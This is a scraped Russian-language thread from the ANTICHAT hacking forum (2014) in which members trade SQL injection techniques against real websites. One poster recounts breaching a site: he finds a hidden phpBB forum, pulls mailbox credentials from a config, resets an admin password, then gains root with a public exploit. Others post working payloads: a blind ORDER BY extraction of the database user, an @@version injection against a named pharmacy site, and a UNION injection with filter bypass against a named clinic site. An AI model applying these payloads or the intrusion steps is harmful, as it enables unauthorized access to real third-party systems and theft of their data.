ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.06.2014, 13:09
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Просто интересно, нахрена, если
Но ты обязательно продолжай и держи нас в курсе событий !! Есть ещё много интересных директорий !
Ответы:
1) Возможно. Правильный путь проверяется load_file любого существующего файла.
2) Напоролся не на тот конфиг Apache, вариант - старый конфиг.
Я не дописал Тоже тестил:
Код:
Code:
/var/www/html/1.txt
/var/www/html/site/1.txt
/var/www/html/sitecom/1.txt
/var/www/html/site.com/1.txt
/var/www/html/web/site/1.txt
/var/www/html/web/sitecom/1.txt
/var/www/html/web/site.com/1.txt
/var/www/html/web/1.txt
И также пробовал подгружать существующий в корне robots Результат такой же. Странно, что сразу не дописал
И нашёл php.ini в корне
|
|
|
04.06.2014, 15:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
а код ошибки при записи какой? мб путь нашол правильно а прав в папке нет
|
|
|
|
04.06.2014, 15:52
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от qaz
qaz said:
а код ошибки при записи какой? мб путь нашол правильно а прав в папке нет
Один и тот же:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]ERROR 1[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]HY000[/COLOR][COLOR="#007700"]):[/COLOR][COLOR="#0000BB"]Can[/COLOR][COLOR="#DD0000"]'t create/write to file '[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]root[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#DD0000"]' (Errcode: 13)
[/COLOR][/COLOR]
Чтобы узнать правильность пути, пишите в каталог. Когда он существует, выводится такая ошибка:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]ERROR 1086[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]HY000[/COLOR][COLOR="#007700"]):[/COLOR][COLOR="#0000BB"]File[/COLOR][COLOR="#DD0000"]'/root'[/COLOR][COLOR="#0000BB"]already exists
[/COLOR][/COLOR]
Этот метод сработает, если двигаться от корня к конечной директории.
|
|
|
|
05.06.2014, 00:09
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Как и просил BigBear, держу вас в курсе.
Дело сдвинулось с мёртвой точки. Просматривал старые страницы сайта, какие они были 3 года назад и набрёл на форум. Его снесли, и перенесли в другую папку. Через час неудач - нашёл его по адресу site.com/forumdeleteadminforum ))))))))
Но и тут возникла неудача - на форуме учётки были привязаны к учёткам на сайте, но на сайте уже совсем всё по другому и 8 из 9 учёток не подошли, как и 9. Но из конфига самого сайта удалось достать доступ к почтовому ящику вида name@site.com на который 9-ый аккаунт смог заретривить пароль. После чего удалось зайти в админку phpbb. Всё удалось. Меня вроде бы ждал успех, но:
http://s019.radikal.ru/i630/1406/a3/8f27972b561f.jpg
.....
Но потом я залился и получил рута через сплоит с рдота .
Знаю текст был лишним, но может кому-нибудь пригодится и он не забросит сайт |
|
|
|
06.06.2014, 14:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
21918
Репутация:
6
|
|
При инъекции в order by существуют ли способы раскрутки, помимо описанных здесь ?
Сообщение от None
Ну чтоже запрос для брута имени текущего юзера будет выглядеть так:
http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),0,1))=11 2,1,-1))
Чтож вывелся обратный порядок новостей => ложь
http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),0,1))=11 3,1,-1))
Опять ложь
http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),0,1))=11 4,1,-1))
О! Прямой порядок новостей => истина
Переводим код символа 114 в символ r. Переходим к следующему символу и тд.
|
|
|
|
06.06.2014, 14:39
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
int, Вашим способом лучше перебирать биты (8 запросов на символ, 7-5 при оптимизации). Есть векторы, основаны на других методах, но пока без полноценного софта:
https://rdot.org/forum/showthread.php?t=2865
|
|
|
|
12.06.2014, 11:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
3011
Репутация:
0
|
|
Помогите раскрутить
http://www.anabolic-pharma.com/?action=nws-show&id=1A
|
|
|
|
12.06.2014, 13:15
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от hakwar
hakwar said:
Помогите раскрутить
http://www.anabolic-pharma.com/?action=nws-show&id=1A
_ttp://www.anabolic-pharma.com/?action=nws-show&id=1+or+1=@@version
Сообщение от None
Microsoft SQL Server 2008 R2 (RTM) - 10.50.1617.0 (Intel X86) Apr 22 2011 11:57:00 Copyright (c) Microsoft Corporation Express Edition with Advanced Services on Windows NT 5.2 (Build 3790: Service Pack 2)
читай мануал и крути:
/thread30501.html
|
|
|
|
12.06.2014, 16:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
3011
Репутация:
0
|
|
Спасибо
|
|
|
|
12.06.2014, 21:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
_http://profclinic.ru/search/?search_string=oops'&x=0&y=0
_http://profclinic.ru/search/?search_string=oopss%27%29%0AAND%0A5851=5851%0Auni on%0Aall%0Aselect%0A1,2,3,4,5,6,7,8,%0A%23&x=0&y=0
Пробелы на %0A корректно заменяются, с запятой сложнее. Начало параметра лучше рандомизировать, т.к. где-то на пути кеширование.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
